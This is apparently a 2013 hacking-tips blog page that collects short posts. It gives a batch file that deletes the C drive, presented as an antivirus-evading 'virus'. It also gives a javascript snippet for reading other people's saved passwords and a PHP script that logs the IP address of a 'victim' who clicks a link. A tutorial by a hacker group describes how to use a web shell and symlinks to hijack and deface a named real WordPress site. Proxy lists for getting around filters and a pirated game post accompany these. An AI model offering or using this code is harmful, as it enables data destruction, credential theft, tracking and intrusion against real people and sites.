Breaking News

Wednesday 30 January 2013

RocketDock


What is RocketDock?

RocketDock is a smoothly animated, alpha blended application launcher. It provides a nice clean interface to drop shortcuts on for easy access and organization. With each item completely customizable there is no end to what you can add and launch from the dock.Now with added Taskbar support your minimized windows can appear as icons on the dock. This allows for better productivity and accessibility.


  

  

 

 

 

 

 

   

   

 

    

 

 

 

 

      Features:

  • Minimize windows to the dock
  • Real-time window previews in Vista
  • Running application indicators
  • Simple drag-n-drop interface
  • Multi-monitor support
  • Supports alpha-blended PNG and ICO icons
  • Icons zoom and transition smoothly
  • Auto-hide and Popup on mouse over
  • Positioning and layering options
  • Fully customizable
  • Completely Portable
  • ObjectDock Docklet support
  • Compatible with MobyDock, ObjectDock, RK Launcher, and Y'z Dock skins
  • Runs great on slower computers
  • Unicode compliant
  • Supports many languages and can easily be translated
  • A friendly user base :)
  • And best of all... its FREE!!! 

Read more ...

Saturday 26 January 2013

Learn To Make Dangerous Virus In A Minute


In my previous post i had teach you guys to create virus that disable mouse andVirus to format Hard Disk. In this post i will teach you to make simple yet very powerfull or you can say harmfullcomputer virus using a batch file. No software is required to make this virus, Noteapad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.


What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

How to Make the virus ?

   1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to yourcomputer.
Read more ...

Get password behind asterisks




           This is trick will let you see password behind asterisks. You might be thinking what is asterisks. It is dots or stars you see when you type password. This trick will let you see password behind asterisks. often people save their password on browser so this trick will let you get their password easily.

  • Go to the page that contain password in asterisks.
  • Now copy the following code.
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();
  • Paste the code into address bar of the page.
  • Now you will get the password on that page.
      NOTE: This trick works on internet explorer and might works on old version of other 
                    web browser.
Read more ...

List of some good proxy sites




             Below is the list of some good proxy site which you can use to surfanoymously on the internet . Even you can use this proxy sites to open block websitein school or offices. For example you can use facebook if it is block at your school or office.


http://aniscartujo.com/webproxy
http://www.badboysproxy.com
http://www.surfscreened.com
http://www.hagiomusic.info
http://www.greenpips.info
http://urlbrowse.com
http://www.hideipaddress.net
http://www.sneakfilter.com
http://www.browsestealth.com
http://www.sneak1.info
http://proxiesrus.com
http://www.surfindark.com
http://www.navydog.com
http://falsario.com
http://www.proxypit.com
http://www.proxypan.com
http://myspacewebproxy.org/
http://www.allfreehere.info
http://www.takefreely.info
http://autobypass.com
http://www.proxcity.info
http://www.proxyzip.org
http://www.cheekyproxy.com
http://www.eggproxy.com
http://www.theschoolcloak.com
http://www.hidemefast.com
http://browseanywhere.info
http://www.404surf.com
http://www.cloakip.net
http://www.browsedark.com
http://www.dartprox.com
http://www.proxish.com
http://www.surfsneak.com
http://www.surfsneaky.com
http://www.browsehidden.com
http://www.filterhide.com
http://www.browsesneak.com
http://myspaceproxyy.com
http://www.browsesneaky.com
http://www.proxyz.us
http://www.sneakschool.com
http://www.iphide.com
http://www.proogle.info
http://greatproxy.info
http://www.playnsurf.info
http://www.realproxy.info
http://aplusproxy.com
http://www.ecoproxy.com
http://freedom.webtuo.com
http://www.slyuser.com/
http://tenpass.com
http://pawxy.com
http://pawxy.org
http://logu.in
    
      If you know such more proxy sites comment below i will add those.
Read more ...

CEH v7 Instructor Slides




     This package includes the following modules.
  • Introduction to Ethical Hacking
  • Footprinting and Reconnaissance
  • Scanning Networks
  • Enumeration
  • System Hacking
  • Trojans and Backdoors
  • Viruses and Worms
  • Sniffers
  • Social Engineering
  • Denial of Service
  • Session Hijacking
  • Hacking Webservers
  • Hacking Web Applications
  • SQL Injection
  • Hacking Wireless Networks
  • Evading IDS, Firewalls and Honeypots
  • Buffer Overflows
  • Cryptography
  • Penetration Testing

Read more ...

Hacking Blackberry Mobile Phone Ebook



Admit it. You're addicted to your BlackBerry. That's okay. Most usersare, and this book is just going to make it worse. Now you'll discover how to use your BlackBerry to retrieve documents, weatherforecasts, and Web infor-mation; use it as a wordprocessor or drawing tool; even control yourcomputer over a network with it. And we haven't even gotten to theway-out stuff.  Tweaks, tricks, and add-on apps to customize your BlackBerry--plus Java code for even cooler hacks.

  • Pick a few of these hacks
  • Play games with BlackBerry
  • Search the Web
  • Connect to your PC wirelessly
  • Use BlackBerry as a USB thumb drive
  • Install custom ringtones
  • Supersize security
  • Draw sketches on your screen
  • Play your BlackBerry like a piano

Read more ...

1000+ Hacking Tutorials collection

Read more ...

Hacking Gps Ebook



  • This is the "user manual" that didn't come with any of the 30 million GPS receivers currently in use, showing readers how to modify, tweak, and hack their GPS to take it to new levels!
  • Crazy-cool modifications include exploiting secret keycodes, revealing hidden features, building power cords and cables, hacking the battery and antenna, protecting a GPS from impact and falls, making a screen protector, and solar-powering a GPS
  • Potential power users will take the function and performance of their GPS to a whole new level by hacking into the firmware and hacking into a PC connectionwith a GPS
  • Fear not! Any potentially dangerous mod (to the device) is clearly labeled, with precautions listed that should be taken
  •  Game time! Readers can check out GPS games, check into hacking geocaching, and even use a GPS as a metal detector

Read more ...

Hacking Ubuntu Linux Free ebook



           Ubuntu, an African word meaning “humanity to others,” is the hottest thing in Linux today. This down-and-dirty book shows you how they can blow away the default system settings and get Ubuntu to behave however you want. You’ll learn how to optimize its appearance, speed, usability, and security and get the low-down on hundreds of hacks such as running Ubuntu from a USB drive, installing it on a Mac, enabling multiple CPUs, and putting scripts in menus and panels.


Read more ...

Backtrack 5 Wireless Penetration Testing

backtrack ebook


Backtrack 5 Wireless Penetration Testing Beginner's Guide will take you through the journey of becoming aWireless hacker. You will learn variouswireless testing methodologies taught using live examples, which you will implement throughout this book. The engaging practical sessions very gradually grow in complexity giving you enough time to ramp up before you get to advancedwireless attacks.
This book will take you through the basicconcepts in Wireless and creating a lab environment for your experiments to the business of different lab sessions inwireless security basics, slowly turn on the heat and move to more complicated scenarios, and finally end your journey byconducting bleeding edge wireless attacks in your lab.



List Of Topic Covered In This Book

  • Create a Wireless Lab for conducting experiments
  • Monitor the air and sniff wireless packets
  • Bypass WLAN authentication mechanism
  • Crack WEP/WPA/WPA2 encryption mechanisms
  • Break into a WLAN network using infrastructure flaws
  • Break into a Wireless client such as a laptop
  • Advanced attacks such as Man-in-the-Middle attacks and Evading WIPS
  • Conduct wireless penetration test in a methodical way
    Read more ...

    How to grab someone IP address



                        I will you show you how to grab someone Ip address using PHP script.This method can be used to grab someone Ip address on yahoo or Facebook chator by sending mail to victim. So Lets get started.

    • Copy the below codes into Notepad and save it as Grab.php (.php is must) 

    <?php
    $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
    $img_number = imagecreate(400,95);
    $backcolor = imagecolorallocate($img_number,10,102,153);
    $textcolor = imagecolorallocate($img_number,255,255,255);

    imagefill($img_number,0,0,$backcolor);
    $number0 = " This is Your IP/Proxy";
    $number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
    $number2 = " Host/Proxy: $hostname";
    $number4 = " _________________________________";

    Imagestring($img_number,10,5,5,$number0,$textcolor);
    Imagestring($img_number,10,5,25,$number1,$textcolor);
    Imagestring($img_number,10,5,45,$number2,$textcolor);
    Imagestring($img_number,10,5,50,$number4,$textcolor);
    Imagestring($img_number,10,8,50,$number4,$textcolor);
    Imagestring($img_number,10,5,10,$number4,$textcolor);
    Imagestring($img_number,10,8,10,$number4,$textcolor);

    header("Content-type: image/png");
    imagepng($img_number);
    $file=fopen("Name-here-to-protect-the-File.txt","a");
    $file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
    fwrite($file, $file2);
    fclose($file);
    ?>



    • Now make Free account on any of  the free web hosting sites Ripway or on My3gb or on 000webhost.com.
    • Now upload Grab.php to your web hosting site.
    • Copy the link of your  uploaded file and send it to victim.
    • As soon as victim will click on your link his ip will be saved in your free web hosting site.
    • Enjoy you are Done !!
    Read more ...

    HaCk Everything with Smtp By Mauritania HaCker Team


    Read more ...

    Trace facebook Photo location!!!!




    Read more ...

    Friday 25 January 2013

    Brothers in Arms: Hell's Highway Free Download

    Brothers in Arms: Hell's Highway (c) Ubisoft

    10/2008 :..... RELEASE.DATE .. PROTECTION .......: Securom
    1 :.......... DISC(S) .. GAME.TYPE .......: Action 


    Read more ...

    Thursday 24 January 2013

    Symlink Tut By Pakistan Cyber Army - Shadow008

    # Asalam-O-Alikum
    # 20/4/2012
    # Pakistan Cyber Army ==========> WwW.CyberArmy.com.PK
    # Symlinking Wordpress Using MadShell
    # HellO everyone
    # In this video tut, I will be teaching you how to hack a wordpress blog using symlink 
    # for this tut, I will be using Madshell
    1st To hack a target wordpress blog,you must have access on the same server !
    2nd Once you got access, upload madshell on it
    # Our target is ===============> cornersmagazine.com/
    # We are going to symlink it and get its database info
    # Onces that is done we will login to its database using dbkiss
    # We will then change the admins password from the database
    # After that we will get access to wordpress blogs admins account and will be able to upload a shell or deface it :D
    # So lets Start !
    # Thanks for watching 
    # I hope you understood the video
    # Please feel free to reply on cyberarmy.com.pk @ Team section
    # Thanks
    # Greets: LeeT Haxor | 1337 | KhantastiC | ZombiE_KSA | H4x0rL1f3 | Invectus and all Pakistan Cyber Army Team
    # Pakistan Cyber Army : CyberArmy.com.pk
    # Video Made By Shadow008


    video Link...

    https://vimeo.com/58096713
    Read more ...
    CopyRight 2015 ComputerInitaite Powered By ComputerInitaite